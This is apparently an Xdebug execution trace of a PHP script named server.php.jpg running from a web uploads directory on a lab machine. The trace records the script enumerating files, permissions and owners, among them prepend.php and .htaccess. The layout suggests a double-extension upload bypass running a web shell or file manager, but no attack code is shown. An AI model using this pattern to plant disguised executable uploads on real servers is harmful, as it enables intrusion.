4	84	R			'root'
3		A						/var/www/html/uploads/server.php.jpg	888	$file['owner_name'] = 'root'
4	85	0	0.005370	795056	function_exists	0		/var/www/html/uploads/server.php.jpg	889	1	'posix_getgrgid'
4	85	1	0.005383	795096
4	85	R			TRUE
4	86	0	0.005396	795056	posix_getgrgid	0		/var/www/html/uploads/server.php.jpg	889	1	0
4	86	1	0.005479	795712
4	86	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	87	0	0.005505	795680	reset	0		/var/www/html/uploads/server.php.jpg	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	87	1	0.005522	796088
4	87	R			'root'
3		A						/var/www/html/uploads/server.php.jpg	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/server.php.jpg	891	$files[] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	88	0	0.005576	795728	readdir	0		/var/www/html/uploads/server.php.jpg	853	1	resource(4) of type (stream)
4	88	1	0.005591	795808
4	88	R			'server.php.jpg'
3		A						/var/www/html/uploads/server.php.jpg	853	$filename = 'server.php.jpg'
3		A						/var/www/html/uploads/server.php.jpg	855	$path = '/var/www/html/uploads/server.php.jpg'
4	89	0	0.005627	795832	lstat	0		/var/www/html/uploads/server.php.jpg	857	1	'/var/www/html/uploads/server.php.jpg'
4	89	1	0.005644	797640
4	89	R			[0 => 2049, 1 => 524475, 2 => 33204, 3 => 1, 4 => 1000, 5 => 1000, 6 => 0, 7 => 77659, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 152, 'dev' => 2049, 'ino' => 524475, 'mode' => 33204, 'nlink' => 1, 'uid' => 1000, 'gid' => 1000, 'rdev' => 0, 'size' => 77659, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 152]
3		A						/var/www/html/uploads/server.php.jpg	857	$stat = [0 => 2049, 1 => 524475, 2 => 33204, 3 => 1, 4 => 1000, 5 => 1000, 6 => 0, 7 => 77659, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 152, 'dev' => 2049, 'ino' => 524475, 'mode' => 33204, 'nlink' => 1, 'uid' => 1000, 'gid' => 1000, 'rdev' => 0, 'size' => 77659, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 152]
4	90	0	0.005706	796544	is_file	0		/var/www/html/uploads/server.php.jpg	862	1	'/var/www/html/uploads/server.php.jpg'
4	90	1	0.005720	796600
4	90	R			TRUE
4	91	0	0.005733	796560	is_dir	0		/var/www/html/uploads/server.php.jpg	863	1	'/var/www/html/uploads/server.php.jpg'
4	91	1	0.005747	796600
4	91	R			FALSE
4	92	0	0.005759	796560	is_link	0		/var/www/html/uploads/server.php.jpg	864	1	'/var/www/html/uploads/server.php.jpg'
4	92	1	0.005772	796600
4	92	R			FALSE
4	93	0	0.005785	796560	is_readable	0		/var/www/html/uploads/server.php.jpg	865	1	'/var/www/html/uploads/server.php.jpg'
4	93	1	0.005800	796600
4	93	R			TRUE
4	94	0	0.005813	796560	is_writable	0		/var/www/html/uploads/server.php.jpg	866	1	'/var/www/html/uploads/server.php.jpg'
4	94	1	0.005829	796600
4	94	R			FALSE
4	95	0	0.005842	796560	filemtime	0		/var/www/html/uploads/server.php.jpg	871	1	'/var/www/html/uploads/server.php.jpg'
4	95	1	0.005855	796600
4	95	R			1676243054
4	96	0	0.005868	796560	fileatime	0		/var/www/html/uploads/server.php.jpg	872	1	'/var/www/html/uploads/server.php.jpg'
4	96	1	0.005880	796600
4	96	R			1676243054
4	97	0	0.005893	796560	filectime	0		/var/www/html/uploads/server.php.jpg	873	1	'/var/www/html/uploads/server.php.jpg'
4	97	1	0.005905	796600
4	97	R			1676243054
3		A						/var/www/html/uploads/server.php.jpg	873	$file = ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054]
4	98	0	0.005950	796560	is_executable	0		/var/www/html/uploads/server.php.jpg	880	1	'/var/www/html/uploads/server.php.jpg'
4	98	1	0.005965	796600
4	98	R			FALSE
3		A						/var/www/html/uploads/server.php.jpg	880	$file['is_executable'] = FALSE
4	99	0	0.005991	796560	function_exists	0		/var/www/html/uploads/server.php.jpg	888	1	'posix_getpwuid'
4	99	1	0.006005	796600
4	99	R			TRUE
4	100	0	0.006018	796560	posix_getpwuid	0		/var/www/html/uploads/server.php.jpg	888	1	1000
4	100	1	0.006049	797376
4	100	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	101	0	0.006073	797344	reset	0		/var/www/html/uploads/server.php.jpg	888	1	['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	101	1	0.006093	797752
4	101	R			'osboxes'
3		A						/var/www/html/uploads/server.php.jpg	888	$file['owner_name'] = 'osboxes'
4	102	0	0.006119	796592	function_exists	0		/var/www/html/uploads/server.php.jpg	889	1	'posix_getgrgid'
4	102	1	0.006132	796632
4	102	R			TRUE
4	103	0	0.006145	796592	posix_getgrgid	0		/var/www/html/uploads/server.php.jpg	889	1	1000
4	103	1	0.006176	797248
4	103	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4	104	0	0.006196	797216	reset	0		/var/www/html/uploads/server.php.jpg	889	1	['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4	104	1	0.006213	797624
4	104	R			'osboxes'
3		A						/var/www/html/uploads/server.php.jpg	889	$file['group_name'] = 'osboxes'
3		A						/var/www/html/uploads/server.php.jpg	891	$files[] = ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	105	0	0.006266	797264	readdir	0		/var/www/html/uploads/server.php.jpg	853	1	resource(4) of type (stream)
4	105	1	0.006281	797344
4	105	R			'prepend.php'
3		A						/var/www/html/uploads/server.php.jpg	853	$filename = 'prepend.php'
3		A						/var/www/html/uploads/server.php.jpg	855	$path = '/var/www/html/uploads/prepend.php'
4	106	0	0.006317	797368	lstat	0		/var/www/html/uploads/server.php.jpg	857	1	'/var/www/html/uploads/prepend.php'
4	106	1	0.006333	799160
4	106	R			[0 => 2049, 1 => 524474, 2 => 33261, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 57, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524474, 'mode' => 33261, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 57, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/server.php.jpg	857	$stat = [0 => 2049, 1 => 524474, 2 => 33261, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 57, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524474, 'mode' => 33261, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 57, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 8]
4	107	0	0.006395	798064	is_file	0		/var/www/html/uploads/server.php.jpg	862	1	'/var/www/html/uploads/prepend.php'
4	107	1	0.006410	798104
4	107	R			TRUE
4	108	0	0.006423	798064	is_dir	0		/var/www/html/uploads/server.php.jpg	863	1	'/var/www/html/uploads/prepend.php'
4	108	1	0.006436	798104
4	108	R			FALSE
4	109	0	0.006449	798064	is_link	0		/var/www/html/uploads/server.php.jpg	864	1	'/var/www/html/uploads/prepend.php'
4	109	1	0.006463	798104
4	109	R			FALSE
4	110	0	0.006475	798064	is_readable	0		/var/www/html/uploads/server.php.jpg	865	1	'/var/www/html/uploads/prepend.php'
4	110	1	0.006490	798104
4	110	R			TRUE
4	111	0	0.006503	798064	is_writable	0		/var/www/html/uploads/server.php.jpg	866	1	'/var/www/html/uploads/prepend.php'
4	111	1	0.006518	798104
4	111	R			FALSE
4	112	0	0.006531	798064	filemtime	0		/var/www/html/uploads/server.php.jpg	871	1	'/var/www/html/uploads/prepend.php'
4	112	1	0.006545	798104
4	112	R			1676243054
4	113	0	0.006558	798064	fileatime	0		/var/www/html/uploads/server.php.jpg	872	1	'/var/www/html/uploads/prepend.php'
4	113	1	0.006571	798104
4	113	R			1676243054
4	114	0	0.006584	798064	filectime	0		/var/www/html/uploads/server.php.jpg	873	1	'/var/www/html/uploads/prepend.php'
4	114	1	0.006596	798104
4	114	R			1676243054
3		A						/var/www/html/uploads/server.php.jpg	873	$file = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054]
4	115	0	0.006635	798064	is_executable	0		/var/www/html/uploads/server.php.jpg	880	1	'/var/www/html/uploads/prepend.php'
4	115	1	0.006655	798104
4	115	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	880	$file['is_executable'] = TRUE
4	116	0	0.006680	798064	function_exists	0		/var/www/html/uploads/server.php.jpg	888	1	'posix_getpwuid'
4	116	1	0.006693	798104
4	116	R			TRUE
4	117	0	0.006706	798064	posix_getpwuid	0		/var/www/html/uploads/server.php.jpg	888	1	0
4	117	1	0.006728	798864
4	117	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	118	0	0.006751	798832	reset	0		/var/www/html/uploads/server.php.jpg	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	118	1	0.006771	799240
4	118	R			'root'
3		A						/var/www/html/uploads/server.php.jpg	888	$file['owner_name'] = 'root'
4	119	0	0.006796	798096	function_exists	0		/var/www/html/uploads/server.php.jpg	889	1	'posix_getgrgid'
4	119	1	0.006809	798136
4	119	R			TRUE
4	120	0	0.006821	798096	posix_getgrgid	0		/var/www/html/uploads/server.php.jpg	889	1	0
4	120	1	0.006842	798752
4	120	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	121	0	0.006862	798720	reset	0		/var/www/html/uploads/server.php.jpg	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	121	1	0.006879	799128
4	121	R			'root'
3		A						/var/www/html/uploads/server.php.jpg	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/server.php.jpg	891	$files[] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	122	0	0.006932	798768	readdir	0		/var/www/html/uploads/server.php.jpg	853	1	resource(4) of type (stream)
4	122	1	0.006946	798840
4	122	R			'data'
3		A						/var/www/html/uploads/server.php.jpg	853	$filename = 'data'
3		A						/var/www/html/uploads/server.php.jpg	855	$path = '/var/www/html/uploads/data'
4	123	0	0.006980	798856	lstat	0		/var/www/html/uploads/server.php.jpg	857	1	'/var/www/html/uploads/data'
4	123	1	0.006997	800640
4	123	R			[0 => 2049, 1 => 524472, 2 => 16895, 3 => 2, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524472, 'mode' => 16895, 'nlink' => 2, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/server.php.jpg	857	$stat = [0 => 2049, 1 => 524472, 2 => 16895, 3 => 2, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524472, 'mode' => 16895, 'nlink' => 2, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 8]
4	124	0	0.007058	799544	is_file	0		/var/www/html/uploads/server.php.jpg	862	1	'/var/www/html/uploads/data'
4	124	1	0.007073	799576
4	124	R			FALSE
4	125	0	0.007086	799536	is_dir	0		/var/www/html/uploads/server.php.jpg	863	1	'/var/www/html/uploads/data'
4	125	1	0.007099	799576
4	125	R			TRUE
4	126	0	0.007111	799536	is_link	0		/var/www/html/uploads/server.php.jpg	864	1	'/var/www/html/uploads/data'
4	126	1	0.007132	799576
4	126	R			FALSE
4	127	0	0.007145	799536	is_readable	0		/var/www/html/uploads/server.php.jpg	865	1	'/var/www/html/uploads/data'
4	127	1	0.007161	799576
4	127	R			TRUE
4	128	0	0.007173	799536	is_writable	0		/var/www/html/uploads/server.php.jpg	866	1	'/var/www/html/uploads/data'
4	128	1	0.007188	799576
4	128	R			TRUE
4	129	0	0.007201	799536	filemtime	0		/var/www/html/uploads/server.php.jpg	871	1	'/var/www/html/uploads/data'
4	129	1	0.007213	799576
4	129	R			1676243054
4	130	0	0.007226	799536	fileatime	0		/var/www/html/uploads/server.php.jpg	872	1	'/var/www/html/uploads/data'
4	130	1	0.007239	799576
4	130	R			1676243054
4	131	0	0.007252	799536	filectime	0		/var/www/html/uploads/server.php.jpg	873	1	'/var/www/html/uploads/data'
4	131	1	0.007265	799576
4	131	R			1676243054
3		A						/var/www/html/uploads/server.php.jpg	873	$file = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054]
4	132	0	0.007304	799592	file_exists	0		/var/www/html/uploads/server.php.jpg	877	1	'/var/www/html/uploads/data/.'
4	132	1	0.007319	799632
4	132	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	877	$file['is_executable'] = TRUE
4	133	0	0.007344	799536	function_exists	0		/var/www/html/uploads/server.php.jpg	888	1	'posix_getpwuid'
4	133	1	0.007361	799576
4	133	R			TRUE
4	134	0	0.007374	799536	posix_getpwuid	0		/var/www/html/uploads/server.php.jpg	888	1	0
4	134	1	0.007397	800336
4	134	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	135	0	0.007420	800304	reset	0		/var/www/html/uploads/server.php.jpg	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	135	1	0.007439	800712
4	135	R			'root'
3		A						/var/www/html/uploads/server.php.jpg	888	$file['owner_name'] = 'root'
4	136	0	0.007465	799568	function_exists	0		/var/www/html/uploads/server.php.jpg	889	1	'posix_getgrgid'
4	136	1	0.007478	799608
4	136	R			TRUE
4	137	0	0.007491	799568	posix_getgrgid	0		/var/www/html/uploads/server.php.jpg	889	1	0
4	137	1	0.007512	800224
4	137	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	138	0	0.007532	800192	reset	0		/var/www/html/uploads/server.php.jpg	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	138	1	0.007548	800600
4	138	R			'root'
3		A						/var/www/html/uploads/server.php.jpg	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/server.php.jpg	891	$files[] = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	139	0	0.007601	800240	readdir	0		/var/www/html/uploads/server.php.jpg	853	1	resource(4) of type (stream)
4	139	1	0.007615	800320
4	139	R			'.htaccess'
3		A						/var/www/html/uploads/server.php.jpg	853	$filename = '.htaccess'
3		A						/var/www/html/uploads/server.php.jpg	855	$path = '/var/www/html/uploads/.htaccess'
4	140	0	0.007650	800336	lstat	0		/var/www/html/uploads/server.php.jpg	857	1	'/var/www/html/uploads/.htaccess'
4	140	1	0.007667	802128
4	140	R			[0 => 2049, 1 => 524473, 2 => 33188, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 64, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524473, 'mode' => 33188, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 64, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/server.php.jpg	857	$stat = [0 => 2049, 1 => 524473, 2 => 33188, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 64, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524473, 'mode' => 33188, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 64, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 8]
4	141	0	0.007728	801032	is_file	0		/var/www/html/uploads/server.php.jpg	862	1	'/var/www/html/uploads/.htaccess'
4	141	1	0.007743	801072
4	141	R			TRUE
4	142	0	0.007756	801032	is_dir	0		/var/www/html/uploads/server.php.jpg	863	1	'/var/www/html/uploads/.htaccess'
4	142	1	0.007769	801072
4	142	R			FALSE
4	143	0	0.007782	801032	is_link	0		/var/www/html/uploads/server.php.jpg	864	1	'/var/www/html/uploads/.htaccess'
4	143	1	0.007794	801072
4	143	R			FALSE
4	144	0	0.007807	801032	is_readable	0		/var/www/html/uploads/server.php.jpg	865	1	'/var/www/html/uploads/.htaccess'
4	144	1	0.007822	801072
4	144	R			TRUE
4	145	0	0.007835	801032	is_writable	0		/var/www/html/uploads/server.php.jpg	866	1	'/var/www/html/uploads/.htaccess'
4	145	1	0.007850	801072
4	145	R			FALSE
4	146	0	0.007863	801032	filemtime	0		/var/www/html/uploads/server.php.jpg	871	1	'/var/www/html/uploads/.htaccess'
4	146	1	0.007889	801072
4	146	R			1676243054
4	147	0	0.007908	801032	fileatime	0		/var/www/html/uploads/server.php.jpg	872	1	'/var/www/html/uploads/.htaccess'
4	147	1	0.007923	801072
4	147	R			1676243054
4	148	0	0.007935	801032	filectime	0		/var/www/html/uploads/server.php.jpg	873	1	'/var/www/html/uploads/.htaccess'
4	148	1	0.007948	801072
4	148	R			1676243054
3		A						/var/www/html/uploads/server.php.jpg	873	$file = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054]
4	149	0	0.007988	801032	is_executable	0		/var/www/html/uploads/server.php.jpg	880	1	'/var/www/html/uploads/.htaccess'
4	149	1	0.008004	801072
4	149	R			FALSE
3		A						/var/www/html/uploads/server.php.jpg	880	$file['is_executable'] = FALSE
4	150	0	0.008030	801032	function_exists	0		/var/www/html/uploads/server.php.jpg	888	1	'posix_getpwuid'
4	150	1	0.008043	801072
4	150	R			TRUE
4	151	0	0.008056	801032	posix_getpwuid	0		/var/www/html/uploads/server.php.jpg	888	1	0
4	151	1	0.008079	801832
4	151	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	152	0	0.008108	801800	reset	0		/var/www/html/uploads/server.php.jpg	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	152	1	0.008127	802208
4	152	R			'root'
3		A						/var/www/html/uploads/server.php.jpg	888	$file['owner_name'] = 'root'
4	153	0	0.008152	801064	function_exists	0		/var/www/html/uploads/server.php.jpg	889	1	'posix_getgrgid'
4	153	1	0.008165	801104
4	153	R			TRUE
4	154	0	0.008178	801064	posix_getgrgid	0		/var/www/html/uploads/server.php.jpg	889	1	0
4	154	1	0.008199	801720
4	154	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	155	0	0.008219	801688	reset	0		/var/www/html/uploads/server.php.jpg	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	155	1	0.008235	802096
4	155	R			'root'
3		A						/var/www/html/uploads/server.php.jpg	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/server.php.jpg	891	$files[] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	156	0	0.008288	801736	readdir	0		/var/www/html/uploads/server.php.jpg	853	1	resource(4) of type (stream)
4	156	1	0.008303	801776
4	156	R			FALSE
3		A						/var/www/html/uploads/server.php.jpg	853	$filename = FALSE
3	52	1	0.008327	799984
3	52	R			[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
2		A						/var/www/html/uploads/server.php.jpg	1186	$list = [0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
3	157	0	0.008504	799984	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1188	2	'sort'	[]
3	157	1	0.008524	800048
3	157	R			FALSE
2		A						/var/www/html/uploads/server.php.jpg	1188	$sort = 'filename'
3	158	0	0.008556	799984	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1189	2	'reverse'	[]
3	158	1	0.008574	800048
3	158	R			FALSE
2		A						/var/www/html/uploads/server.php.jpg	1189	$reverse = FALSE
3	159	0	0.008608	799984	directory_choice	1		/var/www/html/uploads/server.php.jpg	1198	0
4	160	0	0.008626	800128	urlencode	0		/var/www/html/uploads/server.php.jpg	1438	1	'/var/www/html/uploads/'
4	160	1	0.008643	800224
4	160	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4	161	0	0.008665	800192	word	1		/var/www/html/uploads/server.php.jpg	1438	1	'directory'
5	162	0	0.008683	800216	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'Directory'	2	'UTF-8'
5	162	1	0.008704	800488
5	162	R			'Directory'
4	161	1	0.008725	800376
4	161	R			'Directory'
